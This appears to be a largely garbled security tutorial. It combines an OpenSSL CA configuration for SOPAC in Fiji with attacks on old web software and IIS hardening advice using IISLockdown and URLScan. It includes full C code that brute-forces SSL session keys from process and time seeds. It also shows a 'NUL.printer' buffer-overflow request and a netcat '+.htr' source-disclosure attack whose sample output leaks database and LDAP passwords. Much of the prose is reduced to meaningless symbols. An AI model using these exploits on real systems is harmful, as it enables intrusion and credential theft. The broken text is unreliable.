default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes
default_md = sha1
x509_extensions = v3_ca # The extentions to add to the self signed cert
# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret
# This sets a mask for permitted string types. There are several options.
# default: PrintableString, T61String, BMPString.
# pkix : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or
UTF8Strings
# so use this option with caution!
string_mask = nombstr
# req_extensions = v3_req # The extensions to add to a certificate request
[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = FJ
countryName_min = 2
countryName_max = 2
stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Fiji
localityName = Locality Name (eg, city)
localityName_default = Suva
0.organizationName = Organization Name (eg, company)
0.organizationName_default = SOPAC
# we can do this but it is not needed normally :−)
#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = World Wide Web Pty Ltd
organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = ITU
commonName = Common Name (eg, YOUR name)
commonName_max = 64
emailAddress = Email Address
emailAddress_max = 40
# SET−ex3 = SET extension number 3
[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20
unstructuredName = An optional company name
[ usr_cert ]
# These extensions are added when '
ca'signs a request.
# This goes against PKIX guidelines but some CAs do it and some
software
# requires this to avoid interpreting an end user certificate as a CA.
basicConstraints=CA:FALSE
# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.
# This is OK for an SSL server.
# nsCertType = server
# For an object signing certificate this would be used.
# nsCertType = objsign
# For normal client use this is typical
# nsCertType = client, email
# and for everything including object signing:
# nsCertType = client, email, objsign
# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# PKIX recommendations harmless if included in all certificates.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer:always
# This stuff is for subjectAltName and issuerAltname.
# Import the email address.
# subjectAltName=email:copy
# Copy subject details
# issuerAltName=issuer:copy
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ v3_ca ]
# Extensions for a typical CA
# PKIX recommendation.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid:always,issuer:always
# This is what PKIX recommends but some broken software chokes on
critical
# extensions.
# basicConstraints = critical,CA:true
# So we do this instead.
basicConstraints = CA:true
# Key usage: this is typical for a CA certificate. However since it will
# prevent it being used as an test self−signed certificate it is best
# left out by default.
# keyUsage = cRLSign, keyCertSign
# Some might want this also
# nsCertType = sslCA, emailCA
# Include email address in subject alt name: another PKIX
recommendation
# subjectAltName=email:copy
# Copy issuer details
# issuerAltName=issuer:copy
# RAW DER hex encoding of an extension: beware experts only!
# 1.2.3.5=RAW:02:03
# You can even override a supported extension:
# basicConstraints= critical, RAW:30:03:01:01:FF
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ crl_ext ]
# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a
CRL.
# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always
#−−−−End−−−−
a =B*
a
6
_CA]
6
,F 'X
"
)
2 )
SL A)
6
,
Openssl. X 509 - in cacert.pem – out cacert.crt
a "h @
,6
H?
3
O)
-,< E % '2
http://yoursite.com/ssl/cacert.crt
?
< crt \ "
,<
0 <– R
•Y
,
$,
) - 3•
H
.
,
" U4
@
P
<
5<
6 #6•Y "
& 5 <0 <
")
6
3
6
@
B
F
")
0, 5 'X
,
" j
? •Y b
update
'G
3-
B
5F "
)
- 3•S
B Netscapeb
2 0, K5
%.
? 5 5<
@ ) ,6
d *
SL %/
N4
)
<
(E
6& \ , C
5 / SL B
/ ? 4
%P
H" ,
d*
0 … ) 6,› 3
5
$%5
5!
@
6> $
?
'X
0,
6
,
F)
)
SL
),
<
SL A)
O) "
0, 5
YB*
("c – 6—
6
,
3% !
') #
—6
5<
<
6
), Nh5
-N4
#
F ') #
P
# 7, ,
#
5<
)
a Mozilla ) Netscape
:
O)
#
-
,
,
"
,6 * ?
O)
$ ) 42
5< )
-,< - @ 5< 6
F?
0
6
b
2 `56, 5
6
3 j< 4
) ),
O) ) , CA 6
CA ,
<
)
$
"
" , <
MIME \ "
B'
7 #
6
- Y
O) $ % !
a Galeon
)
,< ,6 3
6
2 "
, –6
SL A)
HTML 5F
0
" )
F) Galeon
,
6
6
" $,
% 5! Mozilla
,
3 & 2
CH Galeon
),
a lnternet Explorer
I'/ )
" 0
9
6 D ?@ S L
@
2
2 T
% ') -
3
6
&
d*
,
B-
: IE _-, < Z>
6,G
6
3]
I.12 " ,
F SSL %•) 4 " ,
— )
h @
)
- Y
SL A)
?
)
b
) % ' ) 0, K5 - 3• 3
,
3 6
SL
5!
,6 3 5 !
6
2 # KE @
6 6
,< -,< Z> CA
0, K5 - Y
6-
aC?"
#include <std/disclaimer.h>
#include <stdio.h>
#include <stdlib.h>
typedef unsigned int UINT4;
#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
SSL % '–"
- 4" –
5
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
/* ROTATE_LEFT rotates x left n bits.
*/
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
Rotation is separate from addition to prevent recomputation.
*/
#define FF(a, b, c, d, x, s, ac) { \
(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define GG(a, b, c, d, x, s, ac) { \
(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) { \
(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) { \
(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d =
0x10325476, x[16];
unsigned int i,j;
for (i = 0, j = 0; j < 64; i++, j += 4)
x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
(((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);
/* Round 1 */
FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */
/* Round 2 */
GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */
/* Round 3 */
HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */
/* Round 4 */
II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */
a += 0x67452301;
b += 0xefcdab89;
c += 0x98badcfe;
d += 0x10325476;
/* We need to swap endianness here */
state[0] = ((unsigned char *)&a)[3];
state[1] = ((unsigned char *)&a)[2];
state[2] = ((unsigned char *)&a)[1];
state[3] = ((unsigned char *)&a)[0];
state[4] = ((unsigned char *)&b)[3];
state[5] = ((unsigned char *)&b)[2];
state[6] = ((unsigned char *)&b)[1];
state[7] = ((unsigned char *)&b)[0];
state[8] = ((unsigned char *)&c)[3];
state[9] = ((unsigned char *)&c)[2];
state[10] = ((unsigned char *)&c)[1];
state[11] = ((unsigned char *)&c)[0];
state[12] = ((unsigned char *)&d)[3];
state[13] = ((unsigned char *)&d)[2];
state[14] = ((unsigned char *)&d)[1];
state[15] = ((unsigned char *)&d)[0];
}
#define mklcpr(val)
((0xdeece66d*(val)+0x2bbb62dc)>>1)
int main(int argc, char **argv)
{
int
i;
unsigned char maybe_challenge[16], true_challenge[16];
unsigned char key[16];
char
*p;
unsigned long sec, usec, pid, ppid;
unsigned char eblock[64], cblock[64];
unsigned char *o1;
int
o2;
if (argc == 5 && strlen(argv[4]) >= 47) {
sec = strtol(argv[1], (char **) 0, 0);
pid = strtol(argv[2], (char **) 0, 0);
ppid = strtol(argv[3], (char **) 0, 0);
p = argv[4];
for (i=0; i<16; i++) {
true_challenge[i] = strtol(p, &p, 16);
p++;
}
}
else
{
printf("Usage: %s sec pid ppid "
"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n",
argv[0]);
exit(1);
}
/* Set up eblock and cblock */
for(i=0;i<64;++i) eblock[i]=0;
eblock[8] = 0x80;
eblock[56] = 0x40;
for(i=0;i<64;++i) cblock[i]=0;
cblock[16] = 0x80;
cblock[56] = 0x80;
((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));
for (usec=0; usec < (1<<20); usec++) {
((int *)eblock)[0] = mklcpr(usec);
MD5Transform1(cblock, eblock);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(maybe_challenge, cblock);
if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
printf("Found it! The key is ");
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(key, cblock);
for (i=0; i<0x10; i++)
printf("%2.2X ", (unsigned char) key[i]);
printf("\n");
printf("usec = %lu\n", usec);
exit(0);
}
}
printf("Not found.\n");
exit(1);
}
Microsoft internet information server
(IIS)
T ,
)
O)
6)
2 0,<
"
6b. 2
O) ? •Y
B
5/
1! M,6
-,< ;!
256)
YGX$?
#
B)
)h 4
2
+' , ,F
n & n 9"
IIS )
(
<
6*
a
I
,
B ,
)
6=GX \
Y,
YGX
6 Y1
IIS
#
G ) 6, i X
0,E N T)
E
785/ 2
)
P1
# (DLL) #
B
6
6 *
) 4
,
"
! 5E
H
)
6$;.P 2
@ !
6 Y1
£ B
! B
5/
-
% G N, #
B
! B
5/…
3 B
! B
5/…
?
IIS
-
P1, -,<
IIS
?
IIS
1Q ?
#<@
- NB
4 6F
6ˆ4 b
-,< K , ,F 7c L.
" -)
"
F$showcode.asp
7
2 `56) , -,< K
0, -,< K
H O) ? • Y
785/ )_MDAC/RDS]-
' &
3
3
2 "
5
-
"
#<@$::$DATA P
<6
7 !89 "
?
0
)
# IIS
4"
56% 1 256 0
6=GX
7
- Y
7
IIS
! 5E 2
inetinfo.exe$
,6*
0, -
% ' b
.prniter,
,
4
% '
E
"
DDL
3
B'2
-
TQ
0 <
6 K
7
B ) 256 ) , 6 v 4
$,
3
IIS "
E
B
5! 7
L3 ,
4
-, < / 9 DDL " $_, <
3
F % '2
0,
bP
- N
4 j 40
N ISAPI
7 B
5! ( E
w
3
PHP)COLdfusion I K6-, "
/7
IIS S L ? "
)
- 1
@ B)
" -
6 B'" $IIS0, 5
),
@0 ,
3
f 0,
% ' $
1 2
3
'j 4 7
5G 2
ISAPI "
- Y
P4
F
'
R4 S @ ^
ISAPI
6
H B
5/
$n 9 2 "
,<
O *
"
6 ' ? 5F
6
@^
F
-, 6 U )
)
)
6%
L * iX
0,
4 ) 7 # 0_URL
6=GX) 78#
)
-, < - )@
o
"
], 5
,
5 7
6
5$
),
6'
-, 6 U )
) i.
)
H ? 5F $ F
6 ) nH
, ,F R4 S @ ^
F)
N
ntdll.dll webDAV
SL IIS )
T#< ) =GX
3
"
F
6h @
I ],
N 0, 5 6 '
-, < SL T L.
"
N
6 ) )
"
?5F
3 - *1 7
_PHP)coldfusion
$ R4 S @ ^
H
$O)
( N (, !0, - 5 - Y
F
F) E
) )
6URLb
6
, N)
#
6,
6DLL
? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0
3 I
g
"
l '=GX "
8Q 0 )@
C
_SL ]
7 L
? 56 B )
- Y $O)
2 56,
-,< I
N "$ 1
) S L " U 4 IISS
R 4S
6
L C85! ) - PS L
B'\ 2 " " E
+ E'IIS 6 )
)‚
code red2 ) code red0,
_U )
k
" ,G , 5
-,< ;!
- Y Z
% .6
3 M ,6
)e
? •Y
B3
3
4
RN $p ISAPI
-,<
,F ) W 3 7 B
5! (&B $ ISAPI 6 B'"
)
O)
V < )_server side includes]SSI$_active server pages]ASP
k
?
P1]
3 ], <
7 ) X
")
F
",
)
&
, # 4 (,! % 1
, ,
& IIS
1Q0_ N T L.
,<
T L.
1
-handel
internet server application programming interface 2
<R
1
,
n 9 " 785/
1
) )
N
,
GH )
1QZ&F
P
10
I, 6, -" F
-,< ?
0, -
@-
- Y Z
< ISAPI
0 <
ISAPI DLL
0, <
'
&
IIS O)
b
- 4 '
( E ISAPI )
785/$ <
6)
&
"
4
pqqp T
785/ 2
6=GX "
" j* 2
N
# pqqp T
2
'
0
&
% )@
=
P 4
HTTP , @
-
1
@
b
ISAPI DLL )
^
?
eEye
n 9" k
‹pq C
P
0
@
1Q
F
' &
3
"
#
Digital security$pqqw
ISAPI
B'
% # ) 4_c:\winnt\system32\msw3prt.dll] B'
k
#P
< 6 N4
"T Q
-,< "
0 printer
P 4 _IPP]s
#
3)
h
0, -
(8! $,
0,
) ) pqqw T
Ÿ
0
6 B'?)
"
60, , < ? ) nimda)codered
)
ASP 7 .Y
0, <
+P
85/ 2
%
6ISAPI DLL
O) ) -,<
@"
<-
=B*
'
,@
'printer
F
ISAPI
0 ',6 3 lY 2
IPP0,
6 PF
H)
Ÿ
HOST
3
6
2
420[buffer] 5 H
H
GET/NUL.printer HTTP/1.0
HOST:[buffer]
"), )
<
<
<&
;! )_information],
=GX 2
;! ,
IIS)
0 <
P
10,
'
F- )
" , - e 'j 4 )
<
;! -
IIS
1
)
7
1/
1P 7 L
;! $ <
" , - - ) IIS # N60_ < B
H
B
G
1/
)
,
2
pqqq
O)
,4
‚,6
H) # &F ]
3
)
IIS
. [ ˆ6
)
) ,6 Ÿ IIS
3
'L
2' R
6:3
internet printing protocol
ISAPI DLL
5 printer '
&
b
)@ 6 3 +
F) ISAPI DLL
j 5
!89 ?
,
,<
F) ?
# " %P
H
" ,<
l '
bB
g +P
% '2 <
" - Y
,
5<
+.htr
3
F) ISAPI DLL
@j 5
,<
,
-
j 5 -
3
)
,
F"
G
F 0,
,6
=GX
$ < F IIS b
<N ISM.DLL
htr.txt (
F
% '+
ISM.DLL
-,
,<
'0
! 1/
7
<
"
3 TQ +.htr
'"
?@ ?
56
-, @
+
" E$
"
U)
,<
Ÿ
1Q 5 H 2
Q
/P " • & -
;! ) ,
5<
'
3
=GX -
?@
G0 , 6
1Q 2 0 <
Y bB
g
'
<
7 G:H$5 ) 4IIS
3
"
"
ISAPI DLL
<) ) N F
<
6-
_Source Disclosure]+
% '
ISAPI DLL
% '.htr,
40 ,
,
Y
E
-
2 " NetCat
Ÿ
0
N
GET/sitel/global.asa+.htr HTTP/1.0
[CLRF]
[CLRF]
5<
-,<
H
R4 S @ )
netcat B )
9P " - Y
a,
-,6
f ,
c:\>nc -vv www.victim.com 80<htr.txt
www.victim [10.0.0.10]80(http)open
200 OK
HTTP/1.0
server:microsoft-IIS/5.0
date:thu,25 jan 2001 00:50:17 GMT
<!--filename=global.asa-->("profiles_connectstring")
"DNS=profile;UID=company_user;password=secret"
("DB_connectstring")
="DSN=db;UID=company_user;password=secret"
="DSN=phf;UID=sa;pwd="
("PHFconectstring")
("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas
sword=simple"
("connectionstring")="DSN=company;UID=company_user;password=gu
essme"
("email_pwd")="sendaemon"
="LDAP://DIRECTORY.COMPANY.COM:389"
("ldapserver")
("LDAPUSERLD")="CN=DIRECTORY ADMIN"
("LDAPPWD")="SLAPDME"
?
$GLOPA.ASA% ' ,
T 5G 7
5<0
-,< S#
)
-,
&
,1
7 5B "
6P<
, ,< F
ISAPI DLL
R4 S @ "
N 4)
0
<
T/0,
3
@ 56-
- Y
&
,
3
6ISAPI DLL
,<
) ) 7 !89
7
;!
F) B
,
2 560
<
;!
@ MR /
0,
MR /
),
B
!$
-
'X
?
GF'
B
6
E
)
? DLL
6-,
<N MR/
7
+.HTR +
"
-,6
Ÿ
= B* A) 2 ,
6 3 ;. %LY
j 5
7 !89 ,
‚
ISAPI
: 56
+.HTR ? )&' 0 < 5 -
-,< ?@ ? j 5 ;! ?@ 1P
H GLOBAL.ASA % '
-,6
6 *
') PRINTER
'
@ MR / (,! ) , < TG' g 5
6 D l '-, ,! 78#
, <
^
I'/ IIS
)
< <N
DLL
@
F
0,
- 56DLL
I'.
@ )
6% ' 6 4
B'
<
15 / 785/ "
:A ISAPI DLL+ A
$@
CVA6 A
&2S
AA
@
A
<: $8S& IIS:
+ $A
8
#
$
h6N 0
:;d > 3 b
;
#d
>>
@
MN( d28
<< 8 :
2
)
<N ; !
,
6% ',
B$,
a,
,
-,6
T G' g
COMPUTER ) $, <
?@ 5<
"
6DLL ?
4h
U $,
DLL
PROPERTIES U
O*
)
•MASTER PROPERTIES
•WWW SERVICE
•EDIT
•PROPERTIES OF THE DEFAULT WEB SITE
•HOME DIRECTORY
•APPLICATION SETTING
•CONFIGURATION
•APP MAPPINGS
?@ ) PRINTER ,
4
B'
MSW3PRT.DLL % '$
%#<0,
N
<N
6ISAPI DLL
@
F) ISS
N56
6DLL - 56
@"
MR/
<
"
&2
<N
R4 S @
>G " T),F
, <
0
& &H
" %# < ,
-
P
1
^
?
<
+
! "
ACTIVE
SERVER
.ASP
BUFFER
PAGES
OVERFLOWS,MS02-
FUNCTIONALITY
018
WEB-BASED
.HTR +.HTR
PASSWORD RESET
SOURCE
DISCLOSURE,MS01004
INTERNET
.IDC
6
DATABASE
?
#
<@
Q193689$O)
CONNECTOR
SERVER-SIDE .STM,SHTM,SHTM1
'
INCLUDE
&
MS01-044$ )
INTERNET
.PRINTER -
'
PRINTER
&
MS01-023 )
INDEX SERVER
.IDA,IDQ -
'
&
MS01-033$ )
FRONTPAGE UNINSTALL FPSE
SERVER
EXTENSION
REMOTE
RAD SUPPORT MS01-
IUSR
'
&
RAD
035
SUPPORT
' ) # HOTFIX )PATCH
ISAPI DLL
+'
,
&
N =B*
<N
6
6 g8 0
F)
MS01-026,
-
-
R4 S @
1
),<
6PATCH " ,
-,Y
-, @
6-,
5< #
@ 78#
ISAPI DLL
, -, < ,
)
SL B )
6%
4 MR/
ISAPI DLL 78#
P
9
6S
%
B
5F " 0
F) 78#
N +'
' ) #
‹
R4 S @ () , 7
B)
@]
4
,N
-
%/
N
<
') #
A &
microsoft security bulletine
5<
6 g8 2 " ( ,
6 _, <
0,
,4
' ) # $, ,F 6PATCH
0
-
pqqwT
R4 S @ ?@
")
_HFNETCHK.EXE]
Š
j 4
HFNETCHK # " % P
H P
10, 6
-, < -
A &
' ) # -
6? ,
6
?# 0, K5 SL
' ) # b
-,< ( E
-, < K
6
<
"
(N
"
")
0,6
(E$
-
'
("c$
- Y IIS - 5 PHP
P ),
6
" #
GF
F
l '7c L.
? @ ) - @ T L.
) UPDAE WINDOWS
6U )
(N
$ ' ) #
6
-, < 'X 7c L.
g] -,< 'X 7c L.
2 ),
\) <
-, < 'X
6
)
HOTFIX i:
3 7 !89 , # j 4
-, < K PATCH 2 3@
:
5 HFNETCHK
6
XML B
X !
P
1
#P< HOTFIX -,
K
) PER1IIS,COULDDUSION I
"
1
6 #P< "
6PATCH 2 3@ -
- N4"
PATCH ,
I
5< IIS )
) SERVICE PACK A & ) ,
b
g8 2 p• -, 6 ?
6PATCH % <$
bP ) ("c
? ,
IIS
("c ) - P ' ) #
0, 6 ( E C
IIS
3
_ ') #
URLSCAN,IISLOCHDOWN " - Y
ISSLOCKDOWN WIZARD (
, #4
0,<
)“CUSTOM’
3 &
1/
IISS L
d*
6 '$ IIS SL
a
T G'
g
0
ISS
$
l '
^ P
6U )
5< -, 6 U )
&
d*
F
3
:
' ) # $pqqw T
j
$ ?@
I
7
"7
B, 6
"
3)
: 56)
%
4
IIS
“EXPERT“
u?
u T5! ?# $ S
-" Fa
2, 0 5
)
•
P
1_NNTP,SMTP,FTP,WWW],
5
network hotfix checker
5< I
- 5 -, < K
b
C 5!
6
5 MR/ )_,<
T) ,
5
7
< " $O)
.
6 ISAPI
•
?@
F)
+ 2 `56) IIS
Z F " O) -, 6 U )
0_TFTP.EXE )CMD.EXE I ]
g
%
N ]WEBDAV ? 5 T G' ga 'X
b. #
EXTENSIONS ?
- Y ?5F
gaSCRIPT
5 T G'
MAPS•
_PRINTER)ISM)IDQ)HTRa I ]
@ 2' R ) IIS
CP
-
-, < -
1 c
6
' B
H" %
6
3
5 ‚,
>G
P
10, <
? 5
% !
N
5
E
6 PF -
) 4
3 7 L*
"
IIS W
L*
#4
#B
5! )
O) -, 6 U )
) %
9
?
B
F
5 ) ,<
-
& aURLSCAN•
B'
ˆ 6 6hotfix) SERVICE PACKS L -
,
# $,
,
6 "
@
ˆ6
)
IISLOCKDOWN0,
&
6 PF " )
S L
) "
"
,
2
,F 7
# ?@
6& ? "
URLSCAN$
-,
5 (E
, "), )
IISLOCKDOWN
#4
3
IISLOCKDOWN0
0,< %'g N
@"
@
I'. ˆ 62 `56$, 6
) L*
) X
? 5
B3
URLSCAN
L ,
P
1
5<0 < SL _IISLOCK.EXE] IISLOCKDOWN
a, 6 ( E
C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES
IISLOCKDOWN n 9 " URLSCAN SL
,<
N A)
0 < SL ,
,
,
'
-,
ISAPI
3
5L ) ,<
37
URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN
,<
,<
P
1
B' URLSCAN.DLL0
IIS # " % PH ) ,
,
% 5! % K/
H$SL
,
?56
H IIS B
F
)
# 4 % ' URLSCAN.INI ) , % B
.
' R4 URLSCAN ISAPI b
, PHTTP
3
@,
\
$,
% ' P
1]0 <
- 3•SL
URLSCAN.LOG (
?56
3•URLSCAN.MMDDYY.LOG(
-
2 #5 A &
HTTP 404 OBJECT NOT v 4 ,
HTTP
4
P
[
FOUND
'
5 URLSCAN , # 4
3
6
URLSCAN_ <
3
0,
"
% '
?
a 'R ,<
_- g ) HEAD)POST)GET,
7 5B ]
-,<
,
5 H2
3
3
, , 6 3 ,G ;/P ] V #
<) h
…
4h
…
6URL h
…
B',
-,< &
_,<
6URL
NON-ASCII
6
"
3
: X
nP9 ,
6
>/ h
…
3S
>/ h
…
6, @
>/ h
…
W L*
F) d *
6
4
2 " (,
6
0, < <R URLLSCAN.INI % '
6)
<
&
IIS ?,< F ? "
,
0 < " , - - ) IIS
<
b' URLSCAN.INIa #
T5!
" b'?@
#P< 6"
,
7
"
B') ,
-
B)
N
" ?)
5 ?
, 4 bB
4
2 ,@
#6
,
)
F
?
T/0,
)
F) 3 -,
B' ?
,63
B $
H
5
2 )
0,
•
!"
" #$ %
-
0
H % PH "
TCP SYS
&
4
%
7
) )
z 3
%
j @
N$, 5
)$
<
* +!
- 4
& 21
)
H
@ &F
b'
' (!
"
)
5 0% F O) )
?@ -
B'
26• c 5G
6 F) 3
%3 " 7 9P
-,
u
(E
^P
#P<
6
3
6
,
< 5 V B, @
], <
%3
\)
<
6
?)
3
,
* 4
,
E
2
?# 2
P
1
)
)
_€ Y
+ H) P[ )
V ,
-,
•Y
? )"
H)$
)0
\X
&
2 ?, 5 ' B
IDA/IDQ ISAPI 6,
4 )
6-,
<N
NIMDA)CODE RED (
2 0,
% )
) pqqw T
+ H) P
[ % ',
,
"
3)
- 1
@
"
),
'
)
#
"
B
5/
' &
f
2
, ,F
, 1 ;!
? < 3 6h) ) , 56
&
2 "
R4 S @
. CODE RED (
P
